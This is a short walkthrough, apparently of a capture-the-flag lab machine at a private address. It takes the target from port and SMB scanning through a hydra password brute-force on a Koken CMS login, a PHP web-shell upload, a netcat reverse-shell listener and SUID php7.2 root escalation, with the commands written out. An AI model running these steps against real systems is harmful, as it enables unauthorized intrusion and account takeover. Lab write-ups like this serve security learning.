Initial foothold
- Network discovery
nmap -sn 10.0.2.27/24My target is 10.0.2.47.
2. Port scan
nmap -Pn 10.0.2.47nmap -Pn -p1000- 10.0.2.47
3. OS and service scan
nmap -A -p80,139,445,8000 10.0.2.47Here’re discovered services:
- 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- 139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
- 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
- 8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Enumeration
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X — 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8000/tcp open http Apache httpd 2.4.18 ((Ubuntu))
- HTTP on port 80
nikto scan
nikto -h http://10.0.2.47
Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -qgobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
Access the site
View page source. Possible username revealed.
2. SMB on port 139 and 445
Scan the service
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.47I got accessible directory.
Access “sambashare” and download files
smbclient //10.0.2.47/sambasharedirget mailsent.txtget wordpress.bkp.zipexit
Read the file
cat mailsent.txtI got usernames and emails.
Create user.txt
Create mail.txt
Read wordpress.bkp.zip
unzip wordpress.bkp.zipls -lacd wordpressls -lacat wp-config-sample.php
There’s credential, but I doubt that I can use it. It’s Portugese.
3. HTTP on port 8000
Scan directory using gobuster, but I couldn't scan it.
Use dirbuster instead
There’s /admin directory.
Access the site, this site is build w/ Koken.
View page source, not much revealed.
Search for Koken CMS exploit, I came across this. However, I need credential to exploit it.
Access /admin. It’s login page. It also need email which I already saved as mail.txt.
Test input
I got error message. I will use this to crack password w/ hydra.
Intercept the request w/ Burp Suite.
Crack the password w/ hydra
hydra -L mail.txt -P ~/Desktop/rockyou.txt 10.0.2.47 -s 8000 http-post-form "/api.php?/sessions:email=^USER^&password=^PASS^:F=Incorrect. Try again or reset your password." -V -F -uI got the credential.
Access the site.
Exploitation
- Follow the exploit guide. Create shell file and save as “image.php.jpg”
2. Import the file
3. Intercept w/ Burp and edit the request
Intercept w/ Burp
Edit the request and forward
Verify upload process
Copy the link
Paste it to the browser and test the shell by supply “id” command
4. Reverse shell
Prepare listener on port 443
rlwrap nc -lvp 443
Intercept the shell request and send to the repeater.
I will use command from this cheat sheet.
Encode the command to URL w/ Burp Suite’s decoder.
Paste it to cmd parameter and send the request.
Back to listener, now I got the shell.
Privilege Escaltion
- get TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
2. Explore the directory. I came across interesting files as listed:
cat /var/www/htmk/koken/storage/configuration/database.php
cat /home/daisa/user.txt
3. Verify SUID
find / -perm -u=s -type f 2>/dev/nullI noticed php7.2
Search in GTFOBins
Follow the guide
CMD="/bin/sh"/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"whoami
Now I’m root.
